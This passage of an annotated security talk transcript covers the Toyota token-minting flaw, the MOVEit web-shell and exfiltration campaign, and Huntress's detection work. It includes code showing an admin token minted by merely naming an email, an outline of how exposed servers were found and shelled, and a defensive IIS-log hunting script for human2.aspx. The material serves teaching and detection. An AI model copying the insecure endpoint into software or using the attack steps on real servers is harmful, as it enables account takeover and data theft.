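def create_jwt_hardened(body: dict, cookies: dict, sso_sessions: dict) -> tuple[int, str | None]:
    if "email" in body:
        return 400, None                     # the client does not get to pick who it is
    email = sso_sessions.get(cookies.get("sso_session", ""))
    if email not in USERS:
        return 401, None                     # no IdP-backed session, no token
    return 200, sign_jwt({"sub": email, "role": USERS[email]["role"],
                          "exp": int(time.time()) + 3600})


if __name__ == "__main__":
    status, tok = create_jwt_vulnerable({"email": "admin@example.com"})
    print("vulnerable endpoint:", status, verify_jwt(tok))
    status, tok = create_jwt_hardened({"email": "admin@example.com"}, {}, {})
    print("hardened endpoint, client-picked email:", status)
    sessions = {"s3ss10n": "admin@example.com"}  # assumed: set by the SSO callback
    status, tok = create_jwt_hardened({}, {"sso_session": "s3ss10n"}, sessions)
    print("hardened endpoint, real session:", status, verify_jwt(tok)["sub"])
```

The test you want in an application security review is the first call above: hit the token endpoint directly, with no browser at all, and see whether it will mint a token for an identity you merely named. If it does, no amount of client-side JavaScript will save it.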
"The issue was reported to Toyota on November 3rd, 2022, and they responded later that same day confirming they received the report. On November 23rd they confirmed the issue was remediated, although I know it was fixed before then, when I randomly tested. I then informed them I would publish my write-up after the industry-standard 90 days had passed." Toyota fixed the issue by making the createJWT and findByEmail endpoints return HTTP status 400 Bad Request in all cases. These were some of the ways they were able to just kind of poke at it and go through and figure out they just needed to set those settings and it would flip back, because they all returned responses until you could find them. So good on them for doing it.

MOVEit, described as managed file transfer software. This is another one that I just don't really think went through a lot of security testing, but it certainly is becoming incredibly popular in the enterprise market. When I put these slides together there were several vulnerabilities in it; there's even been one more found after I made my slides. How does it work? It's actually pretty slick. With managed file transfer software, the threat actor would find a host running a MOVEit environment. They had the exploit, the first exploit, CVE-2023-34362, to drop a human2.aspx web shell in there.
They would leverage the web shell to execute commands on the target and connect it to a C2 server, a command-and-control server, where they could exfiltrate the data. This was actually going on for a long time where no one noticed it. These threat actors were just going through finding any servers publicly exposed, embedded on different sites. There are different ways you can search for these; they could find them with tools like Shodan. If you know how to mess around with Google, there are actually some clever ways you can find a lot of these that Google indexed, and they would just go around hitting them. And if they were a target worth exfilling the data from, because there was something on there of value, the C2 server would get a copy of it, and then later they could go through and threaten these people with, "Hey, you wouldn't want all this data publicly exposed." Because these were hospitals, college institutions, many, many cities. That's kind of what got the bigger attention: city and state governments using this in a pretty extreme way. And I had friends that were going through kind of a race against time in calling these individual cities to get them to shut down the server, because we knew they couldn't patch it fast enough. So there was a lot of help coming into the space from cybersecurity researchers, because it was kind of a race against time. The notifications went out, but notifications going out from MOVEit, and they were very on top of it; they had a blog post on it.
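The attack chain just described leaves one indicator even a small IT team can hunt for without the vendor's help: the dropped web shell shows up as an .aspx file that was never part of the install, and every command the attacker runs through it is a request to that file in the IIS logs. Here is an added example of that hunt in code (mine, not Huntress's YARA or Sigma rules, and not the talk's code); the IIS W3C log lines, the baseline page list and the sample IPs are constructed assumptions.

```python
"""Hunt for a dropped web shell in IIS W3C logs: the page names the file
(human2.aspx); anything else ending in .aspx that is not in the clean-install
baseline gets flagged too, which catches a renamed shell. Added example, not
Huntress's rules. KNOWN_PAGES and SAMPLE_LOG are constructed assumptions."""
import re
from collections import Counter
from dataclasses import dataclass

# Indicator from the incident write-ups: the dropped web shell's filename.
WEB_SHELL_NAMES = {"human2.aspx"}

# Assumed baseline of legitimate .aspx pages; build yours from a clean install
# of the same version, not from the possibly compromised server.
KNOWN_PAGES = {"human.aspx", "guestaccess.aspx"}


@dataclass(frozen=True)
class Finding:
    when: str
    client_ip: str
    method: str
    path: str
    status: str
    reason: str


# W3C fields assumed: date time s-ip cs-method cs-uri-stem cs-uri-query s-port
# cs-username c-ip cs(User-Agent) sc-status
_W3C = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) \S+ (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) \d+ \S+ (?P<cip>\S+) (?P<ua>\S+) (?P<status>\d{3})$"
)


def hunt(lines) -> list[Finding]:
    """Flag every request to a known shell name or to an .aspx page outside the
    baseline. Failed requests (404) are kept: an attempt is still a lead."""
    findings = []
    for line in lines:
        if line.startswith("#"):
            continue  # W3C header/comment lines
        m = _W3C.match(line)
        if not m:
            continue  # not in the expected format; leave unparsed lines alone
        name = m["stem"].rsplit("/", 1)[-1].lower()
        reason = None
        if name in WEB_SHELL_NAMES:
            reason = "known web shell filename"
        elif name.endswith(".aspx") and name not in KNOWN_PAGES:
            reason = "aspx page not in baseline"
        if reason:
            findings.append(Finding(f'{m["date"]} {m["time"]}', m["cip"],
                                    m["method"], m["stem"], m["status"], reason))
    return findings


def suspect_ips(findings) -> list[tuple[str, int]]:
    """Rank source IPs by shell interactions. The next pivot is outbound traffic
    from the server (C2, exfil) around these timestamps."""
    return Counter(f.client_ip for f in findings).most_common()


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2023-05-28 01:10:41 10.0.0.20 GET /human.aspx - 443 - 192.0.2.15 Mozilla/5.0 200",
    "2023-05-28 01:12:03 10.0.0.20 POST /human2.aspx - 443 - 198.51.100.7 Mozilla/5.0 200",
    "2023-05-28 01:12:09 10.0.0.20 POST /human2.aspx - 443 - 198.51.100.7 Mozilla/5.0 200",
    "2023-05-28 01:30:55 10.0.0.20 GET /guestaccess.aspx - 443 jdoe 192.0.2.15 Mozilla/5.0 200",
    "2023-05-29 03:02:17 10.0.0.20 POST /temp2.aspx - 443 - 203.0.113.44 python-requests/2.31 404",
]


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for f in found:
        print(f"{f.when} {f.client_ip} {f.method} {f.path} -> {f.status} [{f.reason}]")
    print("suspect sources:", suspect_ips(found))
```

The baseline check is deliberately broad: it will flag a legitimately customised page too, but on a file-transfer appliance that list should be tiny and stable, and a new .aspx appearing on a server you did not change is exactly the event you want a human to look at.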
They were trying to contact clients, but when you talk about thousands and thousands of clients, telling them to patch and telling them to shut down the software they use to get files moved around publicly, you know, neither of those is necessarily going to happen very fast. And if it disrupts business, there's kind of that other problem of they may not want to shut it down. And they also need to investigate how much data was leaked, because they may have some reporting responsibility to do.

Now, in terms of the number of servers out there that the MOVEit SQL injection was able to be actioned on, it was about 2,500 that were found. That doesn't sound like a lot, but when you start saying that these are mostly large-scale companies using it, that suddenly is a different number. Once you start knowing some of these companies are large oil companies and hospitals and college institutions and entire states that use this, that number is suddenly really, really big and really, really scary in terms of impact.

Huntress was actually very on top of this particular incident. Huntress, they start what they refer to as a rapid response when they dive into something like this. So June 1st they added shareable Huntress YARA rules to assist the detection effort. They added Sigma rules to assist the detection effort. What these are: different rules you can apply in your network to see if you're vulnerable, to see if you're being attacked. Added screenshots for the DLL that creates these, and what they do. By putting all this out there as well, they're giving sysadmins the tools they need to really go, "Hey, these are the things you need to start looking for." Added CVE, added registry locations for enriched investigation and analysis, added a video demonstration of proof-of-concept exploitation, added a video demonstration of RCE and ransomware, added the latest CVE and other proof-of-concept details. They went further than just doing it. They said, "Where there's smoke, there's fire."

And this is what I mentioned: there's already another vulnerability that came out since I made these slides. Once you know that there's an app that has a SQL vulnerability and they patch it, there's a chance that they only mitigated the way that attack worked. So you hand them a proof of concept and they go, "We're going to patch it this much." Well, it didn't take long for Huntress to go, "Well, the applied patch stops the way we know they were getting in, but now there's more ways to get in." So they were actually going, "We can actually elevate this from another attack after it's patched, and we can even deploy a ransomware payload if we want." So it's not just about exfil anymore. It's actually about actionable pivoting of this to full admin privileges, because this runs at a high level of privilege in the system, and turning it into a full ransomware event on the servers that are attached to share these files.

I'm gonna leave you with this here: everything we do to secure things before an incident seems alarmist. Everyone tells you you're too crazy; you don't need to do all these things to secure. You don't have to have two laptops. You don't have to keep communications separate. You don't have to build an entire secure environment and audit all these details. But if there's an incident, everything we did before will seem inadequate, because even companies like Mandiant, who do high levels of work to secure their environments, because they are some of the top premier threat hunters and incident response teams, still got popped by the SolarWinds attack. So all the things they had still seemed inadequate once you found out someone was inside your network.

All right, final slide here: sources and further reading. lawrence.video slash Defending Developers 2023. This is where I have all the links for all the sources.
So you can dive deep into that Toyota hack. You can dive deep into the Mandiant write-up on SolarWinds, 3CX and all of these. These are extensive; I've read through all of them. If you go further than the Mandiant one, it's actually fun, because I listened to all the congressional testimony. They revealed even more details, and you can find that even on YouTube. It's pretty easy to find. It's a long watch, but they walked through the details of just how hard some of this stuff was to decipher and take apart. And that's where I learned a lot of this.

Anything you want to reach out to me about, I'm always available, starting at lawrencesystems.com, and whatever socials I'm on are always kept up to date there. I like to point people at my website rather than social media networks that may or may not be here depending on when you're watching this video, because people do things and change their mind about how this should work. Thank you. Leave your questions, comments, concerns down below.